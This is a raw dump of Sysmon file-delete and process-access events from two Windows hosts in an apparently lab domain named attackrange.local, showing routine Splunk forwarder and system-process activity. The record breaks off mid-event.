AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2A4FADFCF0064AB2E028C48274EEA112,SHA256=0CE9D71FB2BF02D9B41F253515B9BEE15D00BA37A4D78C72D00F9F88193DD44F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.513{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5817C9F61E85B8B9752FE7D20D41B5A7,SHA256=3F165CAF4EE067103C272C869A0550F4D3E2C01ACFCCB736672354F8704D3463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.451{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=918E9232F926ADBD5EA36281256E78E9,SHA256=2BF3D11F756E450313C3327F110FC0FDD52E56918FFDC01ED24F33B383A98A8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.404{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EDE455684E706F23925AA8B9DA52EF73,SHA256=B9907C0F8DCC12571119826733DDA9D414E8F9EC89150551A4C2124A813DE6EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.373{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=37F00E59A6EB4CB8092BD7BB7F597563,SHA256=84DF8CD44B08D5AB91726F2C64C582DEB1CA1D1048DD5F96CC135326B5F87768,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.326{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=12E312305AB44834F1665ACC170EEBF7,SHA256=5010CA4152A05237604D1D19D164CD15E0C205F75273CB408ADDE9F670604A98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.279{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F35C6620BE9EFC8EA4ABA45F05F134C4,SHA256=E435FD3CD5049128453B0B56B4881D7DCED431530411575BBF3628C45B11A013,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.232{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=60F785020F64C05518B443B155FF028D,SHA256=11DF5AC38EA71AB1AB1E58B854F3E9871AF37557DD1468A84B6928F3ED228D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.201{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=311BA46D985929777E2FD7BB77862FAA,SHA256=2163D0D4A9E8642BE86A7CA78EBAA5C400F353C6B37F2F77D89D475767C82460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.154{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0BF3699F0B89CCA61975A7E85F6F8DC2,SHA256=0CA2701ABCBB9F686E5E77708639CF103468F25396DC0DA344B60B5E91129593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.107{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B108F97F1E5828CF6EFEFA5D5B2D9BE,SHA256=771CE1738EAFA460724CBCDFB2D7615C5DE57EDAFAD75AA5DEC16C6DCA1BB71F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.045{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F61EDA88605F4AF454922C0A8686FAF7,SHA256=1416482893611126B69B890A1BE29649412AF02F664709280476F0272A942187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.998{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BEA1EB46F8988C9C7C174D93BA558709,SHA256=889420B0BD54566F96D5910717BA6AA1EA7F0731B6C5A64001123F9DA6BF91DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:02.837{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92F45DB10029ED3942AE031AC3F9DE7E,SHA256=F7D854D0714C47536793C7A384AAF11BBEF3041018D8583032C0ECB287402B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:02.837{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BCDFF062A30A76B5122C7491624F0BD,SHA256=F4C935A8788268FBAF2B29EBA1711001A0EACD42F7D0413D8C32C47BF345EFCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.991{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a940|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.850{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF3E5DDF9B04BBF97C794FF0BF809AE,SHA256=2D0DC5F5C97E05768139F4671CF76C0691459815A464ECA88252B6717DFC6217,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.788{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1BD3F6519A6F521C9102B3503F0EF2A3,SHA256=36E166F0AC1050869428BF9E62E9C008793163501AC9FC0749C49793DD4A8C7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.772{5EBD8912-8D37-6151-9C00-00000000FD01}40324896C:\Windows\system32\conhost.exe{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.772{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.756{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:03.902{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF9F2ED4ABB6731D105B7721BB37EA8,SHA256=C272DF847104E4FB6992FF275EE2207424F763BA15E589DDEA132A8F35842CAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 